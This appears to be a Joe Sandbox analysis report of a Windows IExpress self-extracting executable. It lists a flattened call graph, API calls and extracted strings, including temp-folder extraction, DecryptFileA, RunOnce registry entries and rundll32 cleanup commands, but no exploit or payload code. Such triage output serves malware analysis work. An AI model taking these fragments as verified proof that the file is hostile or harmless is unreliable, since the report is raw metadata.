IsDBCSLeadByte 2734->2736 2737 7ff776d12b79 CharNextA CharUpperA 2734->2737 2738 7ff776d12d13 CharNextA 2734->2738 2740 7ff776d12d25 CharNextA 2734->2740 2742 7ff776d12bbe CharPrevA 2734->2742 2748 7ff776d17ea0 2734->2748 2735->2648 2736->2734 2737->2734 2739 7ff776d12c6d CharUpperA 2737->2739 2738->2740 2739->2734 2740->2731 2740->2736 2742->2734 2747 7ff776d17f60 2743->2747 2744 7ff776d17f99 2744->2721 2745 7ff776d17f6a IsDBCSLeadByte 2745->2744 2745->2747 2746 7ff776d17f82 CharNextA 2746->2747 2747->2744 2747->2745 2747->2746 2749 7ff776d17eb8 2748->2749 2749->2749 2750 7ff776d17ec1 CharPrevA 2749->2750 2751 7ff776d17edd CharPrevA 2750->2751 2752 7ff776d17ef4 2751->2752 2753 7ff776d17ed5 2751->2753 2754 7ff776d17efe CharPrevA 2752->2754 2755 7ff776d17f27 2752->2755 2756 7ff776d17f15 CharNextA 2752->2756 2753->2751 2753->2754 2754->2755 2754->2756 2755->2734 2756->2755 2757->2697 2758->2504 2760 7ff776d12213 2759->2760 2763 7ff776d1203d 2759->2763 2760->2315 2761 7ff776d12204 2762 7ff776d186f0 7 API calls 2761->2762 2762->2760 2763->2761 2764 7ff776d120cd FindFirstFileA 2763->2764 2764->2761 2765 7ff776d120ef 2764->2765 2766 7ff776d12129 lstrcmpA 2765->2766 2767 7ff776d12194 2765->2767 2769 7ff776d121ca FindNextFileA 2765->2769 2772 7ff776d17e08 CharPrevA 2765->2772 2773 7ff776d12034 8 API calls 2765->2773 2768 7ff776d12149 lstrcmpA 2766->2768 2766->2769 2770 7ff776d121a5 SetFileAttributesA DeleteFileA 2767->2770 2768->2765 2768->2769 2769->2765 2771 7ff776d121e6 FindClose RemoveDirectoryA 2769->2771 2770->2769 2771->2761 2772->2765 2773->2765 2775 7ff776d12349 RegQueryInfoKeyA RegCloseKey 2774->2775 2776 7ff776d123ad 2774->2776 2775->2776 2776->2324 2778 7ff776d122db 2777->2778 2779 7ff776d12271 2777->2779 2780 7ff776d186f0 7 API calls 2778->2780 2781 7ff776d17e08 CharPrevA 2779->2781 2782 7ff776d122ed 2780->2782 2783 7ff776d12284 WritePrivateProfileStringA _lopen 2781->2783 2782->2324 2783->2778 2784 7ff776d122b7 _llseek _lclose 2783->2784 2784->2778 3092 
7ff776d1511a 3093 7ff776d15128 MessageBeep 3092->3093 3095 7ff776d15173 3093->3095 3096 7ff776d1517c MessageBoxA LocalFree 3095->3096 3097 7ff776d18084 2 API calls 3095->3097 3099 7ff776d15105 3096->3099 3097->3096 3100 7ff776d186f0 7 API calls 3099->3100 3101 7ff776d151dd 3100->3101 3102 7ff776d1845e 3103 7ff776d18478 GetStartupInfoW 3102->3103 3104 7ff776d184ab 3103->3104 3105 7ff776d184da Sleep 3104->3105 3106 7ff776d184bd 3104->3106 3105->3104 3105->3106 3107 7ff776d18569 _initterm 3106->3107 3108 7ff776d18586 _IsNonwritableInCurrentImage 3106->3108 3107->3108 3109 7ff776d1866f _ismbblead 3108->3109 3109->3108 3110 7ff776d1501d 3110->3110 3111 7ff776d15027 3110->3111 3111->3111 3112 7ff776d15047 LocalAlloc 3111->3112 3113 7ff776d15070 3112->3113 3114 7ff776d15105 3112->3114 3115 7ff776d110bc _vsnprintf 3113->3115 3116 7ff776d186f0 7 API calls 3114->3116 3117 7ff776d15088 3115->3117 3118 7ff776d151dd 3116->3118 3117->3114 3119 7ff776d1515c MessageBeep 3117->3119 3120 7ff776d15173 3119->3120 3121 7ff776d1517c MessageBoxA LocalFree 3120->3121 3122 7ff776d18084 2 API calls 3120->3122 3121->3114 3122->3121 3124 7ff776d1831e 3126 7ff776d18332 3124->3126 3131 7ff776d18aa8 GetModuleHandleW 3126->3131 3127 7ff776d18399 __set_app_type 3128 7ff776d183d6 3127->3128 3129 7ff776d183ec 3128->3129 3130 7ff776d183df __setusermatherr 3128->3130 3130->3129 3132 7ff776d18abd 3131->3132 3132->3127 3133 7ff776d1351e 3134 7ff776d1361c 3133->3134 3135 7ff776d13532 3133->3135 3136 7ff776d13625 SendDlgItemMessageA 3134->3136 3140 7ff776d13615 3134->3140 3137 7ff776d13571 GetDesktopWindow 3135->3137 3139 7ff776d1353f 3135->3139 3136->3140 3141 7ff776d14dc8 14 API calls 3137->3141 3138 7ff776d13560 EndDialog 3138->3140 3139->3138 3139->3140 3142 7ff776d13588 6 API calls 3141->3142 3142->3140 3143 7ff776d15a1e 3145 7ff776d15a28 3143->3145 3144 7ff776d15a7d SetFilePointer 3146 7ff776d15a3c 3144->3146 3145->3144 3145->3146 3147 7ff776d18460 3157 7ff776d18bf4 3147->3157 3151 7ff776d184ab 3152 
7ff776d184da Sleep 3151->3152 3153 7ff776d184bd 3151->3153 3152->3151 3152->3153 3154 7ff776d18569 _initterm 3153->3154 3156 7ff776d18586 _IsNonwritableInCurrentImage 3153->3156 3154->3156 3155 7ff776d1866f _ismbblead 3155->3156 3156->3155 3158 7ff776d18c20 6 API calls 3157->3158 3159 7ff776d18469 GetStartupInfoW 3157->3159 3158->3159 3159->3151 3160 7ff776d150a0 3161 7ff776d150a3 3160->3161 3161->3161 3162 7ff776d150ac LocalAlloc 3161->3162 3163 7ff776d150d1 3162->3163 3164 7ff776d15105 3162->3164 3165 7ff776d110bc _vsnprintf 3163->3165 3166 7ff776d186f0 7 API calls 3164->3166 3167 7ff776d150e4 MessageBeep 3165->3167 3169 7ff776d151dd 3166->3169 3170 7ff776d15173 3167->3170 3171 7ff776d18084 2 API calls 3170->3171 3173 7ff776d1517c MessageBoxA LocalFree 3170->3173 3171->3173 3173->3164 3174 7ff776d15820 3175 7ff776d15881 ReadFile 3174->3175 3176 7ff776d1584d 3174->3176 3175->3176 3177 7ff776d182ac 3178 7ff776d182b5 CharNextA 3177->3178 3179 7ff776d1827a 3178->3179 3179->3178 3180 7ff776d15aae GlobalAlloc 3181 7ff776d1146e 3182 7ff776d114c7 GetDesktopWindow 3181->3182 3183 7ff776d114a0 3181->3183 3184 7ff776d14dc8 14 API calls 3182->3184 3185 7ff776d114c3 3183->3185 3187 7ff776d114b2 EndDialog 3183->3187 3186 7ff776d114de LoadStringA SetDlgItemTextA MessageBeep 3184->3186 3188 7ff776d186f0 7 API calls 3185->3188 3186->3185 3187->3185 3189 7ff776d11540 3188->3189 3190 7ff776d1366e 3191 7ff776d13697 3190->3191 3192 7ff776d13946 EndDialog 3190->3192 3194 7ff776d136a7 3191->3194 3195 7ff776d138c2 GetDesktopWindow 3191->3195 3193 7ff776d136ab 3192->3193 3194->3193 3197 7ff776d136bb 3194->3197 3198 7ff776d13775 GetDlgItemTextA 3194->3198 3196 7ff776d14dc8 14 API calls 3195->3196 3199 7ff776d138d9 SetWindowTextA SendDlgItemMessageA 3196->3199 3201 7ff776d13758 EndDialog 3197->3201 3202 7ff776d136c4 3197->3202 3198->3193 3200 7ff776d1379e 3198->3200 3199->3193 3203 7ff776d1391c GetDlgItem EnableWindow 3199->3203 3200->3193 3208 7ff776d137d4 GetFileAttributesA 3200->3208 
3201->3193 3202->3193 3204 7ff776d136d1 LoadStringA 3202->3204 3203->3193 3205 7ff776d1371e 3204->3205 3214 7ff776d136fd 3204->3214 3220 7ff776d14b70 LoadLibraryA 3205->3220 3207 7ff776d13723 3207->3193 3211 7ff776d1372b SetDlgItemTextA 3207->3211 3209 7ff776d137e8 3208->3209 3210 7ff776d1383a 3208->3210 3209->3193 3216 7ff776d13814 CreateDirectoryA 3209->3216 3213 7ff776d17e08 CharPrevA 3210->3213 3211->3193 3211->3214 3212 7ff776d1388f EndDialog 3212->3193 3215 7ff776d1384e 3213->3215 3214->3193 3214->3212 3217 7ff776d16d9c 7 API calls 3215->3217 3216->3193 3216->3210 3218 7ff776d13856 3217->3218 3218->3193 3219 7ff776d16f14 22 API calls 3218->3219 3219->3214 3221 7ff776d14bb4 GetProcAddress 3220->3221 3225 7ff776d14d7f 3220->3225 3222 7ff776d14d69 FreeLibrary 3221->3222 3223 7ff776d14bd6 GetProcAddress 3221->3223 3222->3225 3223->3222 3224 7ff776d14bfb GetProcAddress 3223->3224 3224->3222 3226 7ff776d14c1d 3224->3226 3225->3207 3227 7ff776d14c31 GetTempPathA 3226->3227 3232 7ff776d14c7f FreeLibrary 3226->3232 3228 7ff776d14c46 3227->3228 3228->3228 3229 7ff776d14c4e CharPrevA 3228->3229 3230 7ff776d14c68 CharPrevA 3229->3230 3229->3232 3230->3232 3232->3225 3233 7ff776d18df0 _XcptFilter 2936 7ff776d1862f 2937 7ff776d1863e exit 2936->2937 2938 7ff776d18646 2936->2938 2937->2938 2939 7ff776d1865b 2938->2939 2940 7ff776d1864f _cexit 2938->2940 2940->2939 2941 7ff776d15af1 2942 7ff776d15b3c 2941->2942 2943 7ff776d15b25 2941->2943 2944 7ff776d15b33 2942->2944 2946 7ff776d15b52 2942->2946 2947 7ff776d15c36 2942->2947 2943->2944 2945 7ff776d159b0 CloseHandle 2943->2945 2948 7ff776d186f0 7 API calls 2944->2948 2945->2944 2946->2944 2952 7ff776d15b93 DosDateTimeToFileTime 2946->2952 2949 7ff776d15c42 SetDlgItemTextA 2947->2949 2951 7ff776d15c57 2947->2951 2950 7ff776d15cdb 2948->2950 2949->2951 2951->2944 2966 7ff776d153b8 GetFileAttributesA 2951->2966 2952->2944 2954 7ff776d15bb0 LocalFileTimeToFileTime 2952->2954 2954->2944 2956 7ff776d15bce SetFileTime 2954->2956 
2956->2944 2957 7ff776d15bf6 2956->2957 2959 7ff776d159b0 CloseHandle 2957->2959 2958 7ff776d155c0 5 API calls 2960 7ff776d15c9b 2958->2960 2961 7ff776d15bff SetFileAttributesA 2959->2961 2960->2944 2962 7ff776d15ca8 2960->2962 2961->2944 2973 7ff776d15478 LocalAlloc 2962->2973 2965 7ff776d15cb2 2965->2944 2967 7ff776d1545b 2966->2967 2969 7ff776d153da 2966->2969 2967->2944 2967->2958 2968 7ff776d15442 SetFileAttributesA 2968->2967 2969->2967 2969->2968 2970 7ff776d17d28 4 API calls 2969->2970 2971 7ff776d15424 2970->2971 2971->2967 2971->2968 2972 7ff776d15438 2971->2972 2972->2968 2974 7ff776d154d0 LocalAlloc 2973->2974 2978 7ff776d154a6 2973->2978 2976 7ff776d154ff 2974->2976 2974->2978 2977 7ff776d15522 LocalFree 2976->2977 2977->2978 2978->2965 2979 7ff776d184f1 2983 7ff776d18512 2979->2983 2980 7ff776d18546 2981 7ff776d1854a 2980->2981 2982 7ff776d18569 _initterm 2980->2982 2985 7ff776d18586 _IsNonwritableInCurrentImage 2980->2985 2982->2985 2983->2980 2983->2981 2987 7ff776d18a1e SetUnhandledExceptionFilter 2983->2987 2984 7ff776d1866f _ismbblead 2984->2985 2985->2984 2987->2983

                              Callgraph

                              Callgraph of the analyzed module (interactive rendering; legend: executed, not executed, opacity indicates relevance, disassembly available).

                              Control-flow Graph

                              Control-flow graph of the function at 7ff776d141b4 (interactive rendering; legend: executed, not executed).
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$CompareFindLibraryLocalString$AddressLoadLockProcSizeofmemcpy_smemset
                              • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$Software\Microsoft\Windows\CurrentVersion\RunOnce$USRQCMD$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$vclib$wextract_cleanup0
                              • API String ID: 2679723528-2867732137
                              • Opcode ID: 710c5497f36115af641b03e74af43594c4503a0d4cad7b07eed2db7f93ad28eb
                              • Instruction ID: 925cb1e51fa9154f3ffd19c41c57c3ab7f07c4451769a805f195f59c038bc569
                              • Opcode Fuzzy Hash: 710c5497f36115af641b03e74af43594c4503a0d4cad7b07eed2db7f93ad28eb
                              • Instruction Fuzzy Hash: 31026FB3A3C64286EF28AB30AC541BBB7A1FB84744FC60935D94D46658EFBCD549C720

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery
                              • String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup0
                              • API String ID: 1522771004-3208851462
                              • Opcode ID: 24ed6fb47e8a667b3f55c12bcb1148da6ee4727cab3b4af91dd3ecb4249650ba
                              • Instruction ID: 0d07cf7869bc6c1b749db454f9ac7a4d013daa958032cbe7f83dc79b531fc93f
                              • Opcode Fuzzy Hash: 24ed6fb47e8a667b3f55c12bcb1148da6ee4727cab3b4af91dd3ecb4249650ba
                              • Instruction Fuzzy Hash: A8817CB3A3CA8286EF14AB21EC402BAB7A1FB89B50F865531D94E47758DFBCD505C710

                              Control-flow Graph

                              Control-flow graph of the function at 7ff776d115f4 (interactive rendering; legend: executed, not executed).
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: PrivateProfileString$AllocAttributesCompareFileLocalNamePathShort
                              • String ID: .BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                              • API String ID: 3180205287-1095083631
                              • Opcode ID: 285327837915dcdb5446a0141fb2b704f1838363777c81596740a24fe6d4b02e
                              • Instruction ID: 4540ecb5e007324db7c9c7a7b786c4097496f83287c48da0bf5de43b6e828928
                              • Opcode Fuzzy Hash: 285327837915dcdb5446a0141fb2b704f1838363777c81596740a24fe6d4b02e
                              • Instruction Fuzzy Hash: BCF1BFA3A3C78285EE1AAF30DC102BAA7A1EB45744FD54932DA4D07799DF7DD909C320

                              Control-flow Graph

                              Control-flow graph of the function at 7ff776d168f0 (interactive rendering; legend: executed, not executed).
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Free$AttributesDirectoryFileFindLocal$LoadWindows$AllocCreateDialogDiskDriveErrorIndirectLastLockParamPathSizeofSpaceTempTypelstrcmpmemcpy_s
                              • String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$RUNPROGRAM$Z$msdownld.tmp
                              • API String ID: 1722149602-675003171
                              • Opcode ID: 5f82ba56f4aaa81db981931d09dfdadb71124d73ce1192ccebec0ecc8fc2ed78
                              • Instruction ID: 113e660048452a51b369141635857404e2e3b1db0e3ffd59d0bbc19fa6120c39
                              • Opcode Fuzzy Hash: 5f82ba56f4aaa81db981931d09dfdadb71124d73ce1192ccebec0ecc8fc2ed78
                              • Instruction Fuzzy Hash: 95D194A3A3C68286EF18AB7098501BBF7A1FB85740FD24835DA4E57698DFBDD805C710

                              Control-flow Graph

                              Control-flow graph: function at 7ff776d16f14 (basic blocks 336-382). APIs called from this function: GetCurrentDirectoryA, SetCurrentDirectoryA, GetDiskFreeSpaceA, MulDiv, GetVolumeInformationA, memset, GetLastError, FormatMessageA. Internal subcalls: 7ff776d186f0, 7ff776d14f2c, 7ff776d17958, 7ff776d12520.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: CurrentDirectory
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                              • API String ID: 1611563598-4151094324
                              • Opcode ID: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                              • Instruction ID: 88e6525fa6a557f4e8154e29be2f71a3973b48a512a4e53a90a105376de19e31
                              • Opcode Fuzzy Hash: 4ad38f15274453923d8ffc4da5624aa26f0d8b3708517ab344ed8549bc082ecb
                              • Instruction Fuzzy Hash: 7BA181B7A3C64186EF28AB30E85066BFBA1FB89744F815435EA4D03758DFBCD8458B10

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$FreeItemLoadLockShowWindow$MessageSendSizeofmemcpy_s
                              • String ID: *MEMCAB$CABINET
                              • API String ID: 1305606123-2642027498
                              • Opcode ID: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                              • Instruction ID: 6837778ef63c39f4266a186bd13f8989dff8f29525c0e1335bc7e6b209d5e5df
                              • Opcode Fuzzy Hash: 6bf8904781781a785fe026ead6335db9de58d868f56285484be7c9c0d168fa2d
                              • Instruction Fuzzy Hash: 27512CB2A3CA4286FF18AB70EC54376A6A1FB49745FC24935C90D06659DFBCE444C620

                              Control-flow Graph

                              Control-flow graph: function at 7ff776d12f7b (basic blocks 412-467). APIs called from this function: CreateEventA, SetEvent, CreateMutexA, GetLastError, FindResourceExA, LoadResource, ordinal #17, CloseHandle. Internal subcalls: 7ff776d151f8, 7ff776d14f2c, 7ff776d17320, 7ff776d186f0, 7ff776d12034, 7ff776d13d34, 7ff776d11258, 7ff776d17d28.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Resource$Find$CreateEventLoad$CloseErrorFreeHandleLastLockMutexSizeofVersionmemcpy_s
                              • String ID: $EXTRACTOPT$INSTANCECHECK$VERCHECK$vclib
                              • API String ID: 774100294-3221951907
                              • Opcode ID: e4dd6a0e438f94823f4263b6696aa477d9b79ea039b0de3499e29df42d635c63
                              • Instruction ID: 8989d8449e6cdff9df338b33adaa42a69ef4ce62c437cb2638ba48f122f680ba
                              • Opcode Fuzzy Hash: e4dd6a0e438f94823f4263b6696aa477d9b79ea039b0de3499e29df42d635c63
                              • Instruction Fuzzy Hash: 20616BA3A3C64286FF287B30EC103BBE691AF85755FC24835D84D46699DFFCA5458A20

                              Control-flow Graph

                              Control-flow graph: function at 7ff776d13214 (basic blocks 495-566). APIs called from this function: GetSystemDirectoryA, LoadLibraryA, GetProcAddress, DecryptFileA, FreeLibrary, SetCurrentDirectoryA, GetWindowsDirectoryA. Internal subcalls: 7ff776d161d4, 7ff776d168f0, 7ff776d14064, 7ff776d16294, 7ff776d186f0, 7ff776d17e08, 7ff776d14f2c, 7ff776d17958, 7ff776d16f14, 7ff776d123c0, 7ff776d15f80, 7ff776d17d28, 7ff776d141b4, 7ff776d14a54, 7ff776d17984.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: DirectoryLibrary$AddressAllocDecryptFileFreeLoadLocalProcSystemWindows
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$DecryptFileA$advapi32.dll
                              • API String ID: 3010855178-3008067379
                              • Opcode ID: 17473aa00d8fc118e200a44bf9feefbc95b8e526729a92400f5d85c7f6321eab
                              • Instruction ID: eb23723e258e96127671c68c3a969d9067661172455e7fbcf59f300f428e6493
                              • Opcode Fuzzy Hash: 17473aa00d8fc118e200a44bf9feefbc95b8e526729a92400f5d85c7f6321eab
                              • Instruction Fuzzy Hash: 15714CE3E7C64286FE68BB34EC50277E691AF85340FC34835D94D46299DFECE9458620

                              Control-flow Graph

                              Control-flow graph: function at 7ff776d16710 (basic blocks 567-611). APIs called from this function: CreateDirectoryA, GetSystemInfo, RemoveDirectoryA. Internal subcalls: 7ff776d165a8, 7ff776d16d9c, 7ff776d186f0, 7ff776d16f14, 7ff776d17e08, 7ff776d17958.
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$alpha$i386$mips$ppc
                              • API String ID: 1979080616-1381881128
                              • Opcode ID: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                              • Instruction ID: 4f186ec59e73cc45615f2d1fb7ab1f8bebe6bafdc5e92c298375bc9d2fedd7bc
                              • Opcode Fuzzy Hash: 9a704cb3954627d09357b10cbec955ccf424cbd9ff52b3ee53e2929f97512051
                              • Instruction Fuzzy Hash: FA5186E3F3C68285FE18AB759C102B7E7A1AF45740FDA4836C94D52699CFBDE905C220

                              Control-flow Graph

                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: Handle$AddressCloseExitModuleProcWindows
                              • String ID: @$HeapSetInformation$Kernel32.dll
                              • API String ID: 504435289-1204263913
                              • Opcode ID: 315c05e03fe2e12ab647ef50a7f1a45fa091bbd284ff65291a409f08e8d1d3bb
                              • Instruction ID: b46ec314cbb2e7a662d67a40b4cc7d8b8fac38d88f4c1bc8d88447eda7edf13c
                              • Opcode Fuzzy Hash: 315c05e03fe2e12ab647ef50a7f1a45fa091bbd284ff65291a409f08e8d1d3bb
                              • Instruction Fuzzy Hash: F1314FE3E3C24286FF6C7B70AC51277E691AF49740FC64835D50D4229DEFEDA5848620

                              Control-flow Graph

                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                              • String ID:
                              • API String ID: 836429354-0
                              • Opcode ID: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                              • Instruction ID: b64c2e15bda4084bf1dd0859022c24eb7028bf2e8c5d2084058eb7e4abc3c24b
                              • Opcode Fuzzy Hash: 91cc5e1a10547be1af5b881470c4a552975bb6d87df7be44110ed190adb22146
                              • Instruction Fuzzy Hash: 3A517FA363C68685EF15AF31DC002EAA7A1FB45B84FC58971DA1D07688DF7DD949C320
                              APIs
                              Memory Dump Source
                              • Source File: 00000000.00000002.2289297414.00007FF776D11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF776D10000, based on PE: true
                              • Associated: 00000000.00000002.2289274495.00007FF776D10000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289321204.00007FF776D19000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289338537.00007FF776D1C000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.2289357740.00007FF776D1E000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7ff776d10000_XgKnAQpuPM.jbxd
                              Similarity
                              • API ID: ExceptionFilterUnhandled
                              • String ID:
